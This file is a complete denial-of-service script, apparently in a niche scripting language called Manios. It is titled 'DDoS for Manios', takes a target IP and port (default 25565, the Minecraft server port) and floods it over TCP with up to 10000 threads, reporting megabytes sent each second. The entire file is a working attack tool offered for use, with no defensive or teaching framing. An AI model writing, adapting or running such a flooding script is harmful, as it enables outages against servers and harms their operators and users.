load_ext("/root/.manios/nplugin/nsocks.so")
load_ext("/root/.manios/nplugin/nargs.so")

hold PACKET_PER_CONN = 4
hold DATA_PER_PACKET = 2097152

craft attack_minecraft
    check thread_count > 10000
        set thread_count = 10000
        yell "[!] Max thread count is 10000. Capped to 10000."
    end
    check thread_count < 1
        set thread_count = 1
    end

    yell ""
    yell "[+] Attacking " + ip + ":" + str(port) + " with " + str(thread_count) + " threads..."
    yell "[+] Press Ctrl+C to stop"
    yell ""
    tcp_flood_reset_stats()
    tcp_flood(ip, port, thread_count, DATA_PER_PACKET, PACKET_PER_CONN)
    hold prev = 0
    spin while true
        sleep(1)
        hold now = tcp_flood_stats()
        hold delta = now - prev
        set prev = now
        hold mb = float(delta) / 1048576.0
        hold mbps = (float(delta) * 8.0) / 1048576.0
        yell "[+] Sent " + str(mb) + " MB (" + str(mbps) + " Mbps) to " + ip + ":" + str(port)
    end
end

hold ip = ""
hold port = 25565
hold thread_count = 500

hold arg_count = nargs_count()

check arg_count > 2
    hold raw_arg = nargs_get(2)
    hold colon_pos = find(raw_arg, ":")
    check colon_pos != -1
        set ip = substr(raw_arg, 0, colon_pos)
        hold port_str = substr(raw_arg, colon_pos + 1, len(raw_arg) - colon_pos - 1)
        check port_str != ""
            set port = int(port_str)
        end
    end
    check ip == ""
        yell "Invalid format! Use: mno ddos.mno <ip:port> [thread]"
        yell "Example: mno ddos.mno 1.2.3.4:25565 500"
        halt
    end
    check arg_count > 3
        set thread_count = int(nargs_get(3))
    end
end

check ip == ""
    yell ""
    yell "  DDoS for Manios"
    yell "  Usage: mno ddos.mno <ip:port> [thread]"
    yell ""
    hold data = input("Input IP:PORT Server: ")
    check data == ""
        yell "No input. Exiting."
        halt
    end
    hold colon_pos = find(data, ":")
    check colon_pos == -1
        yell "Invalid format! Use IP:PORT (e.g. 1.2.3.4:25565)"
        halt
    end
    set ip = substr(data, 0, colon_pos)
    hold port_str = substr(data, colon_pos + 1, len(data) - colon_pos - 1)
    check port_str != ""
        set port = int(port_str)
    end
    hold thread_input = input("Thread count (default 500): ")
    check thread_input != ""
        set thread_count = int(thread_input)
    end
end

attack_minecraft()
